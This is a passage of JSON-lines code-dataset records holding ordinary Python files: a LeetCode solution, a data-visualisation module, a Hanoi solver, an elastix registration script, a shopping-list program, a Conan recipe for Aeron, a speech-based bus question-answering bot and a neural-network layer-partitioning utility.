TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def pathSum(self, root: TreeNode, sum: int) -> List[List[int]]:\n res, path = [], []\n\n def dfs(node: TreeNode, tar: int):\n if not node:\n return\n path.append(node.val)\n tar -= node.val\n if tar == 0 and not node.left and not node.right:\n res.append(list(path))\n dfs(node.left, tar)\n dfs(node.right, tar)\n path.pop()\n\n dfs(root, sum)\n return res\n","repo_name":"SaItFish/PySundries","sub_path":"algorithm_questions/LeetCode/剑指Offer/34二叉树中和为某一值的路径.py","file_name":"34二叉树中和为某一值的路径.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6031670682","text":"\"\"\"The 'visualize' module includes functions to create visualizations of the dataset.\"\"\"\n\nfrom pandas.plotting import scatter_matrix\nfrom matplotlib import pyplot\nfrom src.models.train_model import get_dataset\n\n\ndef data_visualization_univariate(retrieved_dataset, shape: bool = True, head: bool = True, describe: bool = True,\n group_by='', box_plot: bool = True, histograms: bool = True) -> None:\n \"\"\"\n Create a visualization of different univariate characteristics of the dataset.\n\n :param retrieved_dataset: The parameter holding the dataset\n :param bool shape: Boolean parameter used to trigger the visualization of the dataset's shape on or off\n :param bool head: Boolean parameter used to trigger the visualization of the dataset's head on or off\n :param bool describe: Boolean parameter used to trigger the visualization of the dataset's description, containing\n the count, mean, std, min and max of the dataset, on or off\n :param str group_by: When not an empty string, groups the dataset by the category corresponding to the contents of\n the string\n :param bool box_plot: Boolean parameter used to trigger the visualization of the dataset's box plot\n :param bool histograms: Boolean parameter used to trigger the visualization of the dataset's histogram\n :return:\n \"\"\"\n # shape\n if shape:\n print('\\n', retrieved_dataset.shape)\n\n # head\n if head:\n print('\\n', retrieved_dataset.head(20))\n\n # descriptions\n if describe:\n print('\\n', retrieved_dataset.describe())\n\n # class distribution\n if group_by != '':\n print('\\n', retrieved_dataset.groupby(group_by).size())\n\n # box and whisker plots\n if box_plot:\n retrieved_dataset.plot(kind='box', subplots=True, layout=(2, 2), sharex=False, sharey=False)\n\n # histograms\n if histograms:\n retrieved_dataset.hist()\n\n\ndef data_visualization_multivariate(retrieved_dataset) -> None:\n \"\"\"\n Create a visualization of the multivariate characteristic of the dataset known as scatter plot matrix.\n\n :param retrieved_dataset: The parameter holding the dataset\n :return:\n \"\"\"\n # scatter plot matrix\n scatter_matrix(retrieved_dataset)\n pyplot.show()\n\n\nif __name__ == '__main__':\n retrieved_dataset = get_dataset('external')\n data_visualization_univariate(retrieved_dataset=retrieved_dataset, group_by='Genre')\n data_visualization_multivariate(retrieved_dataset)\n","repo_name":"MunteanIoanHoriaMihai/Predicting-Customer-Behaviour","sub_path":"src/visualization/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8111780477","text":"#Hanoi Tower\n#no는 출력할때만 원반 번호의미를 띄고\n# 재귀함수 호출시에는 옮기는 원반개수의 역할을 한다.\n\nimport sys\ndef move(no, x, y):\n global cnt\n cnt += 1\n \n \n if no > 1 and no <= 20: \n move(no-1, x, 6-x-y)\n #recur 하향식 분석 참고. \n moves.append([x, y])\n cnts.append(cnt)\n \n \n #왜 print 가 가운데 있는가? move 함수 자체의 뜻; \n #원반 번호를 그대로 의마하는 것을 출려하기 위해\n\n if no > 1 and no <= 20:\n move(no-1, 6-x-y, y)\n\n\nn = int(sys.stdin.readline())\ncnt = 0\ncnts = []\nmoves = []\nif n <= 20:\n move(n, 1, 3)\n print(cnts[-1])\n for x, y in moves:\n print(x, y)\n \nelif n > 20:\n print(2**n-1)\n\n","repo_name":"Hunue-Park/Algorithm_study","sub_path":"BOJ/1st_week/1914.py","file_name":"1914.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36047185634","text":"\"\"\"\nregistration for image and associated segmentation mask using elastix.\n\"\"\"\nimport pathlib\nimport shutil\nimport subprocess\n\n\n# elastix files\nelastix_base = pathlib.Path(r'C:\\Users\\zhaoyang\\Desktop\\elastix-5.0.0-win64')\nelastix = elastix_base.joinpath(r'elastix.exe')\ntransformix = elastix_base.joinpath(r'transformix.exe')\n# see: http://elastix.bigr.nl/wiki/index.php/Default0\np_Rigid = elastix_base.joinpath(r'parameters\\Parameters_Rigid.txt')\np_BSpline = elastix_base.joinpath(r'parameters\\Parameters_BSpline.txt')\n\n\ndef create_dir(path: pathlib.Path, parents: bool=True):\n \"\"\"\n create directory if dose not exists.\n :param path: pathlib.Path: create dir path object\n :param parents: boolean: weather create parents dir, default is True.\n :return:\n \"\"\"\n if not path.exists():\n path.mkdir(parents=parents)\n\n\ndef get_pname(p: pathlib.Path):\n \"\"\"\n resolve patient name.\n\n e.g.\n /path/to/abc.mha -> abc\n /path/to/abc_seg.mha -> abc\n \"\"\"\n if p.stem.endswith('_seg'):\n return p.stem[:-len('_seg')]\n return p.stem\n\n\ndef split_fixed_moving(src_ori_dir: pathlib.Path, src_seg_dir: pathlib.Path, fx_id: int=0):\n # fx_id: fixed image ID\n\n # collect all image paths\n ori_path_list = list(src_ori_dir.iterdir())\n ori_path_list = sorted(ori_path_list)\n\n # collect all ground-truth paths\n seg_path_list = [src_seg_dir.joinpath(ori_path.stem + '_seg' + ori_path.suffix) for ori_path in ori_path_list]\n\n # fixed image file path\n fixed_ori_path = ori_path_list.pop(fx_id)\n fixed_seg_path = seg_path_list.pop(fx_id)\n print(f'fixed: {fixed_ori_path.stem}')\n\n # moving image files path list\n moving_ori_paths = ori_path_list\n moving_seg_paths = seg_path_list\n\n return (fixed_ori_path, moving_ori_paths,\n fixed_seg_path, moving_seg_paths)\n\n\ndef process_oris(fixed_path: pathlib.Path, moving_paths: list, reg_tmp_dir: pathlib.Path, copy_dst_dir: pathlib.Path):\n \"\"\"Registion process for original image.\n\n Arguments:\n fixed_path {pathlib.Path} -- src fixed orginal image dir path\n moving_paths {list} -- src moving orginal image path list\n reg_tmp_dir {pathlib.Path} -- elastix tmp output dir path\n copy_dst_dir {pathlib.Path} -- finall dir path, copy registion result into\n \"\"\"\n for moving_path in moving_paths:\n print(f'processing moving: {moving_path.stem}')\n\n # result output path\n output_dir = reg_tmp_dir.joinpath(moving_path.stem)\n create_dir(output_dir)\n\n # elastix command\n command = f'{elastix} -f {fixed_path} -m {moving_path} -p {p_Rigid} -p {p_BSpline} -out {output_dir}'\n print(f'elastix command: {command}')\n\n p = subprocess.Popen(command)\n p.wait()\n\n # copy registered results\n copy_to_dir = copy_dst_dir.joinpath(moving_path.parent.stem)\n create_dir(copy_to_dir)\n copy_to_file = copy_to_dir.joinpath(moving_path.name)\n\n registered_file = output_dir.joinpath('result.1.mha')\n shutil.copy(registered_file, copy_to_file)\n\n\ndef process_segs(moving_paths: list, reg_tmp_dir: pathlib.Path, copy_dst_dir: pathlib.Path):\n \"\"\"Registion process for original image.\n Transform label map using the deformation field from process_oris()\n\n Arguments:\n moving_paths {list} -- src moving atlas or associated segmentation path list\n reg_tmp_dir {pathlib.Path} -- elastix tmp output dir path\n copy_dst_dir {pathlib.Path} -- finall dir path, copy registion result into\n \"\"\"\n for moving_path in moving_paths:\n output_dir = reg_tmp_dir.joinpath(get_pname(moving_path))\n tp = output_dir.joinpath('TransformParameters.1.txt')\n tp_label = output_dir.joinpath('TransformParameters.1.ForLable.txt')\n\n # modify TransformParameters.1.txt for label reg\n with tp.open('r') as f_tp:\n lines = f_tp.readlines()\n lines[30] = '(FinalBSplineInterpolationOrder 0)\\n'\n lines[34] = '(DefaultPixelValue 0)\\n'\n lines[36] = '(ResultImagePixelType \"int\")\\n'\n with tp_label.open('w') as f_tp_label:\n f_tp_label.writelines(lines)\n\n # elastix command\n # use \"-def all\" to transform all points from the input-image, which effectively generates a deformation field.\n command = f'{transformix} -def all -in {moving_path} -tp {tp_label} -out {output_dir}'\n print(f'elastix command: {command}')\n\n p = subprocess.Popen(command)\n p.wait()\n\n # copy registered results\n copy_to_dir = copy_dst_dir.joinpath(moving_path.parent.stem)\n create_dir(copy_to_dir)\n copy_to_file = copy_to_dir.joinpath(moving_path.name)\n\n registered_file = output_dir.joinpath('result.mha')\n shutil.copy(registered_file, copy_to_file)\n\n\nif __name__ == '__main__':\n # source path\n src_path = pathlib.Path(r'C:\\Users\\zhaoyang\\Desktop\\data_2d')\n src_ori_dir = src_path.joinpath('ori')\n src_seg_dir = src_path.joinpath('seg')\n\n # destination path\n reg_tmp_path = pathlib.Path(r'C:\\Users\\zhaoyang\\Desktop\\data_reg_tmp')\n copy_dst_path = pathlib.Path(r'C:\\Users\\zhaoyang\\Desktop\\data_reg_copy')\n\n # get fixed and moving images\n fixed_ori_path, moving_ori_paths, \\\n fixed_seg_path, moving_seg_paths = split_fixed_moving(src_ori_dir, src_seg_dir)\n\n # precess\n process_oris(fixed_ori_path, moving_ori_paths, reg_tmp_path, copy_dst_path)\n process_segs(moving_seg_paths, reg_tmp_path, copy_dst_path)\n\n # remove reg_tmp_path\n # shutil.rmtree(reg_tmp_path)\n","repo_name":"kernel1994/tool-scripts","sub_path":"register_elastix.py","file_name":"register_elastix.py","file_ext":"py","file_size_in_byte":5624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39908247551","text":"\"\"\"\nFaça uma lista de compras com listas\no utilizador deve ter a possibilidade de inserir, apagar e listar valores da sua lista\nmão permita que o programa quebre com\nerros de indices inexistentes na lista\n\"\"\"\nimport os\n\nlista_de_compras = []\n\nwhile True:\n opção = input(\"Selecione uma opção\\n[i]nserir [a]pagar [l]istar [5] Para Sair \").lower()\n \n os.system(\"cls\")\n\n if opção == \"i\":\n produtos = input(\"Inserir um produto: \")\n lista_de_compras.append(produtos)\n \n elif opção == \"l\":\n for indice, produto in enumerate(lista_de_compras):\n print(indice, produto)\n \n elif opção == \"a\":\n produto_para_apagar = input(\"Indique o indice do produto a apagar: \")\n try:\n del lista_de_compras[int(produto_para_apagar)]\n except IndexError:\n print(\"O Indice inserido não é válido\")\n except ValueError:\n print(\"O numero não é inteiro\")\n except Exception:\n print(\"Erro Desconhecido\")\n\n elif opção == \"5\":\n break\n else:\n print(f\"{opção} não é uma opção válida!!\")\n# print(lista_de_compras)","repo_name":"joaocampossss/Prython_Formacao","sub_path":"venv/12.lista_de_compras.py","file_name":"12.lista_de_compras.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31930517285","text":"from conan import ConanFile\nfrom conan.errors import ConanInvalidConfiguration\nfrom conan.tools.build import check_min_cppstd\nfrom conan.tools.cmake import CMake, CMakeToolchain, cmake_layout\nfrom conan.tools.env import VirtualBuildEnv\nfrom conan.tools.files import collect_libs, copy, get, replace_in_file, rename, rm\nfrom conan.tools.microsoft import is_msvc\nfrom conan.tools.scm import Version\nimport glob\nimport os\n\nrequired_conan_version = \">=1.53.0\"\n\n\nclass AeronConan(ConanFile):\n name = \"aeron\"\n description = \"Efficient reliable UDP unicast, UDP multicast, and IPC message transport\"\n topics = (\"udp\", \"messaging\", \"low-latency\")\n url = \"https://github.com/conan-io/conan-center-index\"\n homepage = \"https://github.com/real-logic/aeron\"\n license = \"Apache-2.0\"\n\n package_type = \"library\"\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n \"build_aeron_driver\": [True, False],\n \"build_aeron_archive_api\": [True, False],\n }\n default_options = {\n \"shared\": False,\n \"fPIC\": True,\n \"build_aeron_driver\": True,\n \"build_aeron_archive_api\": True,\n }\n\n @property\n def _min_cppstd(self):\n return \"11\"\n\n @property\n def _compilers_minimum_version(self):\n return {\n \"Visual Studio\": \"16\",\n \"msvc\": \"192\",\n \"gcc\": \"5\",\n }\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def configure(self):\n if self.options.shared:\n self.options.rm_safe(\"fPIC\")\n\n def layout(self):\n cmake_layout(self, src_folder=\"src\")\n\n def validate(self):\n if self.settings.compiler.get_safe(\"cppstd\"):\n check_min_cppstd(self, self._min_cppstd)\n\n minimum_version = self._compilers_minimum_version.get(str(self.settings.compiler), False)\n if minimum_version and Version(self.settings.compiler.version) < minimum_version:\n raise ConanInvalidConfiguration(\n f\"{self.ref} requires C++{self._min_cppstd}, which your compiler does not support.\"\n )\n\n if self.settings.os == \"Macos\" and self.settings.arch == \"armv8\":\n raise ConanInvalidConfiguration(\"This platform (os=Macos arch=armv8) is not yet supported by this recipe\")\n\n def build_requirements(self):\n self.tool_requires(\"zulu-openjdk/11.0.19\")\n\n def source(self):\n get(self, **self.conan_data[\"sources\"][self.version], strip_root=True)\n\n def generate(self):\n env = VirtualBuildEnv(self)\n env.generate()\n tc = CMakeToolchain(self)\n tc.cache_variables[\"BUILD_AERON_DRIVER\"] = self.options.build_aeron_driver\n tc.cache_variables[\"BUILD_AERON_ARCHIVE_API\"] = self.options.build_aeron_archive_api\n tc.cache_variables[\"AERON_TESTS\"] = False\n tc.cache_variables[\"AERON_SYSTEM_TESTS\"] = False\n tc.cache_variables[\"AERON_SLOW_SYSTEM_TESTS\"] = False\n tc.cache_variables[\"AERON_BUILD_SAMPLES\"] = False\n tc.cache_variables[\"AERON_BUILD_DOCUMENTATION\"] = False\n tc.cache_variables[\"AERON_INSTALL_TARGETS\"] = True\n tc.cache_variables[\"AERON_ENABLE_NONSTANDARD_OPTIMIZATIONS\"] = True\n # The finite-math-only optimization has no effect and can cause linking errors\n # when linked against glibc >= 2.31\n tc.blocks[\"cmake_flags_init\"].template += (\n 'string(APPEND CMAKE_CXX_FLAGS_INIT \" -fno-finite-math-only\")\\n'\n 'string(APPEND CMAKE_C_FLAGS_INIT \" -fno-finite-math-only\")\\n'\n )\n tc.generate()\n\n def _patch_sources(self):\n replace_in_file(self, os.path.join(self.source_folder, \"CMakeLists.txt\"), \"/MTd\", \"\")\n replace_in_file(self, os.path.join(self.source_folder, \"CMakeLists.txt\"), \"/MT\", \"\")\n\n def build(self):\n self._patch_sources()\n cmake = CMake(self)\n cmake.configure()\n cmake.build()\n\n def package(self):\n copy(self, \"LICENSE\", src=self.source_folder, dst=os.path.join(self.package_folder, \"licenses\"))\n cmake = CMake(self)\n cmake.install()\n\n archive_resources_dir = os.path.join(self.source_folder, \"aeron-archive\", \"src\", \"main\", \"resources\")\n copy(self, \"*\", src=archive_resources_dir, dst=os.path.join(self.package_folder, \"res\"))\n\n archive_include_dir = os.path.join(self.source_folder, \"aeron-archive\", \"src\", \"main\", \"cpp\", \"client\")\n copy(self, \"*.h\", src=archive_include_dir, dst=os.path.join(self.package_folder, \"include\", \"aeron-archive\"))\n\n lib_folder = os.path.join(self.package_folder, \"lib\")\n bin_folder = os.path.join(self.package_folder, \"bin\")\n for dll in glob.glob(os.path.join(lib_folder, \"*.dll\")):\n rename(self, dll, os.path.join(bin_folder, os.path.basename(dll)))\n\n if self.options.shared:\n for lib in glob.glob(os.path.join(lib_folder, \"*.a\")):\n if not lib.endswith(\".dll.a\"):\n os.remove(lib)\n rm(self, \"*static.lib\", lib_folder)\n rm(self, \"aeron_client.lib\", lib_folder)\n else:\n rm(self, \"*.dll\", bin_folder)\n rm(self, \"*.so*\", lib_folder)\n rm(self, \"*.dylib\", lib_folder)\n rm(self, \"*.dll.a\", lib_folder)\n rm(self, \"*shared.lib\", lib_folder)\n rm(self, \"aeron.lib\", lib_folder)\n\n def package_info(self):\n self.cpp_info.libs = collect_libs(self)\n if is_msvc(self):\n self.cpp_info.defines.append(\"_ENABLE_EXTENDED_ALIGNED_STORAGE\")\n if self.settings.os in [\"Linux\", \"FreeBSD\"]:\n self.cpp_info.system_libs.extend([\"dl\", \"m\", \"pthread\"])\n elif self.settings.os == \"Windows\":\n self.cpp_info.system_libs = [\"winmm\", \"wsock32\", \"ws2_32\", \"iphlpapi\"]\n self.cpp_info.defines.append(\"HAVE_WSAPOLL\")\n\n # TODO: to remove in conan v2\n self.env_info.PATH.append(os.path.join(self.package_folder, \"bin\"))\n","repo_name":"conan-io/conan-center-index","sub_path":"recipes/aeron/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":6060,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"764026644","text":"\n############## Speech to Text ##############\nimport numpy as np\nimport wave\nimport pyaudio\nimport time\n\nimport noisereduce as nr\n\nfrom transformers import Wav2Vec2Processor, Wav2Vec2ForCTC\nfrom transformers import pipeline\nimport torch\n\nimport librosa\n\nLANG_ID = \"en\"\nMODEL_ID = \"jonatasgrosman/wav2vec2-large-xlsr-53-english\"\nSAMPLES = 10\n\nspeech_to_text_processor = Wav2Vec2Processor.from_pretrained(MODEL_ID)\nspeech_to_text_model = Wav2Vec2ForCTC.from_pretrained(MODEL_ID)\n\ndef save_audio_file(seconds=5, CHUNK = 1024, FORMAT = pyaudio.paInt16, CHANNELS = 1, RATE = 22050):\n # Record the audio\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, frames_per_buffer=CHUNK)\n print(\"Started Recording for\" + str(seconds) + \"seconds...\")\n frames = []\n \n for i in range(0, int(RATE/CHUNK * seconds)):\n data = stream.read(CHUNK)\n frames.append(data)\n \n print(\"Recording Stopped..\")\n stream.stop_stream()\n stream.close()\n p.terminate()\n \n #Saving the audio\n file_name = 'output_' + str(int(time.time())) + '.wav' \n wf = wave.open(\"./Dataset/Temp/\"+file_name, 'wb')\n wf.setnchannels(CHANNELS)\n wf.setsampwidth(p.get_sample_size(FORMAT))\n wf.setframerate(RATE)\n wf.writeframes(b''.join(frames))\n wf.close()\n \n return file_name\n\ndef speech_to_text(model, processor, audio_file):\n data, sample_rate = librosa.load(audio_file, sr=16000)\n reduced_noise = nr.reduce_noise(y=data, sr=sample_rate)\n input_values = processor(reduced_noise, sampling_rate=sample_rate, return_tensors=\"pt\", padding=\"longest\").input_values\n logits = model(input_values).logits\n predicted_ids = torch.argmax(logits, dim=-1)\n transcription = processor.batch_decode(predicted_ids)\n return transcription\n\n# speech_to_text(model, processor, '../Dataset/Temp/output_1663921799.wav')\n\n\n############## Question Answering ##############\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sentence_transformers import SentenceTransformer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nimport itertools\n\nquestion_answer = pipeline(\"question-answering\", model=\"deepset/electra-base-squad2\", top_k=5)\n\nf = open(\"./Dataset/context.txt\", \"r\")\ncontext = f.read()\nf.close()\n\ndef max_sum_sim(doc_embedding, candidate_embeddings, candidates, top_n, nr_candidates):\n # Calculate distances and extract keywords\n distances = cosine_similarity(doc_embedding, candidate_embeddings)\n distances_candidates = cosine_similarity(candidate_embeddings, \n candidate_embeddings)\n\n # Get top_n words as candidates based on cosine similarity\n words_idx = list(distances.argsort()[0][-nr_candidates:])\n words_vals = [candidates[index] for index in words_idx]\n distances_candidates = distances_candidates[np.ix_(words_idx, words_idx)]\n\n # Calculate the combination of words that are the least similar to each other\n min_sim = np.inf\n candidate = None\n for combination in itertools.combinations(range(len(words_idx)), top_n):\n sim = sum([distances_candidates[i][j] for i in combination for j in combination if i != j])\n if sim < min_sim:\n candidate = combination\n min_sim = sim\n\n if(candidate): \n return [words_vals[idx] for idx in candidate]\n else:\n return []\n\ndef mmr(doc_embedding, word_embeddings, words, top_n, diversity):\n\n # Extract similarity within words, and between words and the document\n word_doc_similarity = cosine_similarity(word_embeddings, doc_embedding)\n word_similarity = cosine_similarity(word_embeddings)\n\n # Initialize candidates and already choose best keyword/keyphras\n keywords_idx = [np.argmax(word_doc_similarity)]\n candidates_idx = [i for i in range(len(words)) if i != keywords_idx[0]]\n\n for _ in range(top_n - 1):\n # Extract similarities within candidates and\n # between candidates and selected keywords/phrases\n candidate_similarities = word_doc_similarity[candidates_idx, :]\n target_similarities = np.max(word_similarity[candidates_idx][:, keywords_idx], axis=1)\n\n # Calculate MMR\n mmr = (1-diversity) * candidate_similarities - diversity * target_similarities.reshape(-1, 1)\n if(mmr.size > 0):\n mmr_idx = candidates_idx[np.argmax(mmr)]\n\n # Update keywords & candidates\n keywords_idx.append(mmr_idx)\n candidates_idx.remove(mmr_idx)\n\n return [words[idx] for idx in keywords_idx]\n\ndef get_keywords_keyBert(sentences, model_name='distilbert-base-nli-mean-tokens', n_gram_range=(1, 2), stop_words=\"english\", top_n=10, diversification=None, nr_candidates=15, diversity=0.5):\n #Get candidate phrases\n count = CountVectorizer(ngram_range=n_gram_range, stop_words=stop_words).fit([sentences])\n candidates = count.get_feature_names_out()\n \n #Load Model\n model = SentenceTransformer(model_name)\n doc_embedding = model.encode([sentences])\n candidate_embeddings = model.encode(candidates)\n \n #Calculate distance between embedding to find similarty\n if(diversification == None):\n distances = cosine_similarity(doc_embedding, candidate_embeddings)\n keywords = [candidates[index] for index in distances.argsort()[0][-top_n:]]\n elif(diversification == 'max_sum_sim'):\n keywords = max_sum_sim(doc_embedding, candidate_embeddings, candidates, top_n=top_n, nr_candidates=nr_candidates)\n elif(diversification == 'mmr'):\n keywords = mmr(doc_embedding, candidate_embeddings, candidates, top_n=top_n, diversity=diversity)\n \n return list(set(keywords))\n\ndef get_short_context(question, context):\n keywords = get_keywords_keyBert(question, model_name='all-MiniLM-L6-v2', n_gram_range=(1, 1), diversification='mmr', top_n=3, diversity=0.8)\n possible_context = set()\n for keyword in keywords:\n for sent in context.split('. '):\n if keyword in sent.lower():\n possible_context.add(sent)\n possible_context = list(possible_context)\n possible_context = '. '.join(possible_context)\n \n return possible_context\n\ndef get_answers(question, context):\n short_context = get_short_context(question, context)\n qa_input = {\n 'question': question,\n 'context': context\n }\n res = question_answer(qa_input)\n final_answers = set()\n for r in res:\n if(r['score'] > 0.99):\n final_answers.add(r['answer'])\n \n answers = list(final_answers)\n if(len(answers) == 0):\n return 'No buses available for this route and time'\n else:\n return ', '.join(answers)\n\n########################### Text to Speech ###########################\nimport torchaudio\nfrom speechbrain.pretrained import Tacotron2\nfrom speechbrain.pretrained import HIFIGAN\nfrom playsound import playsound\n\ntacotron2 = Tacotron2.from_hparams(source=\"speechbrain/tts-tacotron2-ljspeech\", savedir=\"./Notebooks/tmpdir_tts\")\nhifi_gan = HIFIGAN.from_hparams(source=\"speechbrain/tts-hifigan-ljspeech\", savedir=\"./Notebooks/tmpdir_vocoder\")\n\ndef text_to_speech(text):\n mel_output, mel_length, alignment = tacotron2.encode_text(text)\n waveforms = hifi_gan.decode_batch(mel_output)\n file_name = 'result_' + str(int(time.time())) + '.wav' \n torchaudio.save('./Dataset/Temp/'+file_name, waveforms.squeeze(1), 22050)\n \n return file_name\n\n########################### Runner Function ###########################\n\nimport speech_recognition as sr\n\nr = sr.Recognizer();\n\ndef record_audio():\n print(\"Ask the Question...\")\n with sr.Microphone() as source:\n audio = r.listen(source)\n voice_data = ''\n try:\n voice_data = r.recognize_google(audio)\n except sr.UnknownValueError:\n return \"Sorry I didnt get that\"\n except sr.RequestError:\n return \"Sorry, My Speech service is down\"\n\n return voice_data; \n\nif __name__ == '__main__':\n print(\"Bus Buddy Started\")\n # input_file_name = save_audio_file()\n # input_question = speech_to_text(speech_to_text_model, speech_to_text_processor, './Dataset/Temp/'+input_file_name)\n # print(input_question)\n input_question = record_audio()\n print(input_question)\n output_answers = get_answers(input_question, context)\n print(output_answers)\n output_file_name = text_to_speech(output_answers)\n print(output_answers)\n playsound('./Dataset/Temp/'+output_file_name)","repo_name":"Nihal-Srivastava05/Conversational-Speech-bot","sub_path":"ConversationalSpeechBot.py","file_name":"ConversationalSpeechBot.py","file_ext":"py","file_size_in_byte":8503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23432000169","text":"from util import *\nfrom ExecutionUnit import ExecutionUnit\nfrom models.googlenet import BasicConv2d\nimport queue\nimport numpy as np\nimport torch.nn as nn\n\ndef translate_next_array(next_array):\n for i in range(len(next_array)): # 将next数组内的单个元素处理为长度为1的列表\n if not isinstance(next_array[i], list):\n next_array[i] = [next_array[i]]\n\n\ndef next_to_last(next): # 将next数组转化为last数组,即last数组\n total = len(next)\n last = [[] for _ in range(total)]\n # last_array[0].append(-1) # -1 represents the original input\n for i, nexts in enumerate(next):\n for l in nexts:\n last[l].append(i)\n return last\n\n\n# print(len(layers))\n# layers_dependency = next_to_last(next_array)\n\n\ndef topology_DAG(next_array, last_array): # transfer the DAG network to topology list, starts from 0, bfs\n total = len(next_array)\n in_num = np.zeros(total)\n for i in range(total):\n in_num[i] = len(last_array[i])\n q = queue.Queue()\n q.put(0)\n ans = []\n while not q.empty():\n ele = q.get()\n ans.append(ele)\n if isinstance(next_array[ele], list):\n for i in next_array[ele]:\n in_num[i] -= 1\n if in_num[i] == 0:\n q.put(i)\n else:\n in_num[next_array[ele]] -= 1\n if in_num[next_array[ele]] == 0:\n q.put(next_array[ele])\n return ans\n\n\n# average distribution\n# output features range of layer\n\n\ndef cal_output_shape(net, topology_list, last_array):\n layers = net.layers\n n_layers = len(topology_list)\n output_shapes = [[] for _ in range(n_layers)]\n mark = np.zeros(n_layers)\n for lth in topology_list:\n mark[lth] = 1\n if layers[lth] == 'concat':\n inputs = []\n for last in last_array[lth]:\n inputs.append(torch.randn(output_shapes[last]))\n output = torch.cat(inputs, 1)\n\n else:\n if lth == 0:\n input_shape = 1, *net.input_shape\n else:\n input_shape = output_shapes[last_array[lth][0]]\n x = torch.randn(input_shape)\n this_layer = net.layers[lth]\n if isinstance(this_layer, nn.Linear):\n x = torch.flatten(x, 1)\n output = this_layer(x)\n output_shapes[lth] = output.shape\n\n return output_shapes\n\n\ndef cal_output(layers, topology_list, last_array, x):\n n_layers = len(topology_list)\n outputs = [None for _ in range(n_layers)]\n mark = np.zeros(n_layers)\n for lth in topology_list:\n if lth == 0:\n outputs[0] = layers[0](x)\n continue\n mark[lth] = 1\n if layers[lth] == 'concat':\n inputs = [outputs[i] for i in last_array[lth]]\n output = torch.cat(inputs, 1)\n else:\n assert len(last_array[lth]) == 1\n last_layer = last_array[lth][0]\n output = layers[lth](outputs[last_layer])\n outputs[lth] = output\n return outputs\n\n\n# layers_output_shapes = cal_output_shape(model, topology_layers, layers_dependency)\n\n\n# def cal_inputFromOutput(output_shapes, last_layers):\n# n_layers = len(output_shapes)\n# input_shapes = [[] for _ in range(n_layers)]\n# for nl in topology_layers:\n# if nl == 0:\n# input_shape = [1, 3, 224, 224]\n# else:\n# lasts = last_layers[nl]\n# if len(lasts) == 1:\n# last_array = lasts[0]\n# input_shape = output_shapes[last_array]\n# else: # have over 1 last_array layers\n# input_shape = []\n# for last_array in lasts:\n# input_shape.append(output_shapes[last_array])\n# input_shapes[nl] = input_shape\n# return input_shapes\n#\n#\n# # compute the layers' output shape and store in model\n# model.input_shapes = cal_inputFromOutput(layers_output_shapes, layers_dependency)\n\n\n# print(model.output_shapes)\n\n\n# partitioning dimension: -1 # 假设从最后一维开始切\ndef workload_partition(output_shapes, num_device): # temporarily average\n partitions = []\n for i, shape in enumerate(output_shapes):\n # if layers[i] == 'concat':\n # partitions.append(1)\n # else:\n length = shape[-1]\n partition = [0 for _ in range(num_device + 1)]\n partition[-1] = length\n average = round(length / num_device)\n for i in range(1, num_device):\n partition[i] = average * i\n partitions.append(partition)\n return partitions\n\n\n# def random_workload_partition(output_shapes, num_device):\n# partitions = []\n# for i, shape in enumerate(output_shapes):\n# length = shape[-1]\n# partition = []\n# cnt = 0\n# while cnt < num_device - 1:\n# p = random.randint(1, length - 1)\n# if p not in partition:\n# cnt += 1\n# partition.append(p)\n# partition.sort()\n# partition = [0, *partition, length]\n# partitions.append(partition)\n# return partitions\n\n\ndef generate_layerConfigs(layers: list):\n configs = []\n for layer in layers:\n if isinstance(layer, BasicConv2d):\n conv = layer.conv\n layer_config = {'type': 'basicConv', 'kernel_size': conv.kernel_size, 'stride': conv.stride,\n 'padding': conv.padding} # , 'bn_args': (bn.weight, bn.bias, False, bn.momentum, bn.eps)}\n elif isinstance(layer, nn.Conv2d):\n layer_config = {'type': 'basicConv', 'kernel_size': layer.kernel_size, 'stride': layer.stride,\n 'padding': layer.padding}\n elif isinstance(layer, nn.ReLU):\n layer_config = {'type': 'relu', 'inplace': layer.inplace}\n elif isinstance(layer, nn.MaxPool2d):\n layer_config = {'type': 'maxpool', 'kernel_size': layer.kernel_size, 'stride': layer.stride,\n 'padding': layer.padding, 'ceil_mode': layer.ceil_mode}\n elif isinstance(layer, nn.Upsample):\n layer_config = {'type': 'upsample', 'scale_factor': layer.scale_factor}\n elif layer == 'concat':\n layer_config = {'type': layer}\n else: # only given kinds of layers\n layer_config = None\n print('This type of layer is not supported yet')\n configs.append(layer_config)\n\n return configs\n\n\ndef generate_layerConfig(layer):\n if isinstance(layer, BasicConv2d):\n conv = layer.conv\n layer_config = {'type': 'basicConv', 'kernel_size': conv.kernel_size, 'stride': conv.stride,\n 'padding': conv.padding} # , 'bn_args': (bn.weight, bn.bias, False, bn.momentum, bn.eps)}\n elif isinstance(layer, nn.Conv2d):\n layer_config = {'type': 'conv', 'kernel_size': layer.kernel_size, 'stride': layer.stride,\n 'padding': layer.padding}\n elif isinstance(layer, nn.MaxPool2d):\n layer_config = {'type': 'maxpool', 'kernel_size': layer.kernel_size, 'stride': layer.stride,\n 'padding': layer.padding, 'ceil_mode': layer.ceil_mode}\n elif isinstance(layer, nn.Upsample):\n layer_config = 